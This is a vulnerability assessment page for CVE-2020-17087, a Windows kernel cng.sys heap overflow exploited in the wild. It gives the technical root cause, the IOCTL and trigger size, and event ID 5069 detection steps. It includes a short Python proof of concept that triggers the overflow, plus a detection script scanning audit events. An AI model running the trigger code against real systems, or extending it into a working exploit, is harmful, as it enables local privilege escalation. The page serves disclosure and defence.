CVE-2020-17087 Windows Kernel local privilege escalation 0day
Description
Windows Kernel Local Elevation of Privilege Vulnerability
Ratings
- Attacker Value: High
- Exploitability: Medium
Technical Analysis
An error exists within cng!CfgAdtpFormatPropertyBlock where a buffer is allocated from a value that is truncated to 16 bits. The function then goes on and performs a binary to ASCII hex conversion, writing the ASCII hex characters to this buffer. While performing the conversion, the original buffer’s correct length is used, causing the write to continue out of bounds.
The vector for this vulnerability is local. A malicious attacker would first have to have code execution on the target system from any context, including that of a sandboxed application. From there they would open a handle to \\.\GLOBALROOT\Device\Cng before issuing the 0x390400 IOCTL with a crafted input buffer. The crafted input buffer contains a size parameter as one of the fields that, when set to 0x2aab or greater, will trigger the overflow.
Exploitation of this bug won’t be easy due to it being a heap based memory corruption within the kernel’s NonPagedPool. The attacker has partial control over the size of the allocation as constrained by ((size * 6) & 0xffff).
This vulnerability was originally reported by Google’s Project Zero, who also reported that it is being actively exploited in the wild. The original report is on their tracker. The live in the wild exploitation is reportedly targeted and not related to the US elections. A patch is expected to be released on November 10th, 2020.
While the vulnerable code appears to be present within Windows 7 SP1 x64, as verified through static analysis, the original PoC provided by Google’s Project Zero team does not trigger the bug on this platform. Within the callstack the chain is accessible; however, a difference within the implementations is causing cng!BCryptSetContextFunctionProperty to branch, leading to the path to cng!CfgAdtReportFunctionPropertyModification being missed.
Detection
Attempted exploitation of this vulnerability can be detected through auditing event ID 5069. This must be configured in order to detect exploitation attempts. To enable it, start secpol.msc, then navigate to Security Settings > Advanced Audit Policy Configuration > System Audit Policies > Policy Change. Set Audit Other Policy Change Events to enable both “Success” and “Failure”. With this change in place, event ID 5069 will be loaded to the standard Windows Security Log that is accessible through the event viewer.
Exploitation attempts can then be identified through the length of the reported “value” field.
Proof of Concept
The following is a port of the original Proof of Concept released by Google Project Zero into Python and updated to demonstrate the vulnerability on both Windows 7 SP1 and Windows 10.
import ctypes
import random
# https://github.com/zeroSteiner/mayhem
from mayhem.windll import *

# property block of 0x2aab bytes, the smallest size that reaches the 16-bit truncation
value = (ctypes.c_ubyte * 0x2aab)()
bcrypt.BCryptSetContextFunctionProperty(
    bcrypt.CRYPT_LOCAL,
    'Default',
    bcrypt.BCryptInterface.Cipher,
    'AES',
    # random pszProperty so each run creates a new property and hits the bug once
    "XXX_{:08x}".format(random.randint(0, 0xffffffff)),
    len(value),
    value
)
Instead of directly issuing the IOCTL, this variant uses the bcrypt!BCryptSetContextFunctionProperty function with the appropriate arguments. Randomizing the pszProperty argument helps to ensure that the vulnerability is triggered exactly once each time the code is run.
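As an added example (not code from the AttackerKB page, the assessment author or Rapid7), the following Python models the truncated allocation described in the analysis, derives the 0x2aab trigger size from it, and reuses that figure as the length threshold when scanning event ID 5069 records. Assumptions: the 5069 EventData element names (SubjectUserName, Property, Value) and the ASCII-hex rendering of Value are assumed, not confirmed on the page, and the two sample records are constructed.

```python
import xml.etree.ElementTree as ET

# Figures from the analysis above: the buffer is allocated from ((size * 6) & 0xffff)
# while the hex conversion writes the full size * 6 bytes.
BYTES_PER_INPUT_BYTE = 6
EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

def alloc_vs_write(size):
    """Return (allocated, written, out_of_bounds) byte counts for a size-byte property block."""
    written = size * BYTES_PER_INPUT_BYTE
    allocated = written & 0xFFFF          # the 16-bit truncation
    return allocated, written, written - allocated

def min_trigger_size():
    """Smallest property size whose truncated allocation is too small (expected 0x2aab)."""
    size = 1
    while alloc_vs_write(size)[2] == 0:
        size += 1
    return size

# Assumption: the "Value" element of event 5069 holds the ASCII-hex rendering of the
# property block, i.e. at least two characters per input byte.
VALUE_LEN_THRESHOLD = 2 * min_trigger_size()

def suspicious_5069_events(xml_records, threshold=VALUE_LEN_THRESHOLD):
    """Return [(record_id, subject, value_len)] for 5069 events whose Value is oversized."""
    hits = []
    for raw in xml_records:
        ev = ET.fromstring(raw)
        if ev.findtext("e:System/e:EventID", namespaces=EVT_NS) != "5069":
            continue
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", EVT_NS)}
        vlen = len(data.get("Value", ""))
        if vlen >= threshold:
            hits.append((ev.findtext("e:System/e:EventRecordID", namespaces=EVT_NS),
                         data.get("SubjectUserName", "?"), vlen))
    return hits

def _record(rid, user, value):
    """Constructed sample record in the Windows event XML layout (not real telemetry)."""
    return ('<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
            f'<System><EventID>5069</EventID><EventRecordID>{rid}</EventRecordID></System>'
            f'<EventData><Data Name="SubjectUserName">{user}</Data>'
            f'<Data Name="Property">XXX_00000000</Data><Data Name="Value">{value}</Data>'
            '</EventData></Event>')

SAMPLE_RECORDS = [
    _record(101, "svc_backup", "0100000004000000"),            # ordinary short property
    _record(102, "sandboxed_app", "00" * min_trigger_size()),   # overflow-sized block
]
```

On a live host the same XML strings can be obtained from the Security log with PowerShell's Get-WinEvent (filter on Id 5069) and each event's ToXml() method.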
Ratings
- Attacker Value: High
Technical Analysis
Actively exploited in the wild, interesting take here: https://www.secpod.com/blog/windows-zero-day-vulnerability-being-exploited-in-the-wild-cve-2020-17087/?utm_source=Windows%20Zero%20Day%20Nov%2003&utm_medium=email&utm_campaign=Windows%20Zero%20Day%20November%2003
General Information
Vendors
- microsoft
Products
- windows 10
- windows 10 1607
- windows 10 1803
- windows 10 1809
- windows 10 1903
- windows 10 1909
- windows 10 2004
- windows 10 20h2
- windows 7
- windows 8.1
- windows rt 8.1
- windows server 2008
- windows server 2008 r2
- windows server 2012
- windows server 2012 r2
- windows server 2016
- windows server 2016 1903
- windows server 2016 1909
- windows server 2016 2004
- windows server 2016 20h2
- windows server 2019
Exploited in the Wild
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- News Article or Blog (https://www.tenable.com/blog/cve-2020-15999-cve-2020-17087-google-chrome-microsoft-windows-kernel-zero-day-vulnerabilities-exploited-in-wild-along-with-cve-2020-16009)
- Other: Google EITW Root Cause Analysis (https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-17087.html)
Additional Info
Technical Analysis
Update: CVE-2020-17087 was patched on November 10, 2020, as part of Microsoft’s November Patch Tuesday release.
Description
On October 30, 2020, Google’s Project Zero team publicly disclosed CVE-2020-17087, a zero-day vulnerability in the Windows Kernel Cryptography Driver (cng.sys). The vulnerability arises from input/output controller (IOCTL) 0x390400 processing and could allow a local attacker to escalate privileges, including for sandbox escape. The vulnerability is unpatched as of October 30—a patch is currently expected on November 10, 2020 as part of Microsoft’s November Patch Tuesday release.
Project Zero researchers said in their disclosure that Google has seen evidence of the zero day’s being used in targeted attacks in the wild. Project Zero lead Ben Hawkes said on Twitter that CVE-2020-17087 was used in conjunction with CVE-2020-15999, another zero-day in Google Chrome, to form an exploit chain that allowed attackers to escape Chrome’s sandbox to execute code on the underlying (Windows) operating system.
Affected products
In their initial report on October 22, 2020, Mateusz Jurczyk and Sergei Glazunov of Project Zero said they’d verified that an up-to-date build of Windows 10 1903 (64-bit) was vulnerable, but that they believed that the vulnerability had been present since at least Windows 7.
Rapid7 analysis
An unpatched zero-day in the Windows kernel affecting a huge swath of Windows users and seeing in-the-wild exploitation is undoubtedly a concern. Both rich technical detail and PoC code are readily available to the public, including researchers and attackers looking to build exploit chains of their own. Rapid7 researchers were also able to easily reproduce the crash on Windows 10 (v1909 build 18362). However, as Metasploit research lead Spencer McIntyre points out in his assessment of CVE-2020-17087, the vulnerability’s value to attackers is high, but its exploitability is at least somewhat more limited than it might appear at first glance. Creating a full exploit chain would require a primitive (i.e., an info leak) to turn the crash into code execution.
It’s possible we’ll see PoC exploit code quickly that extends the Project Zero researchers’ work and enables broader-scale attacks than the targeted exploitation Google disclosed to Microsoft earlier this month. It’s also possible, however, that the difficulty of reliably exploiting heap corruption vulnerabilities will slow down at-scale attacker capabilities until Microsoft releases a patch.
Very well written, thank you. There is a PoC published on GitHub I have tried but have not seen it produce event ID 5069 with correct audit policy logging turned on. I’m going to try the PoC (which I should have in the first place) you included in this post and verify.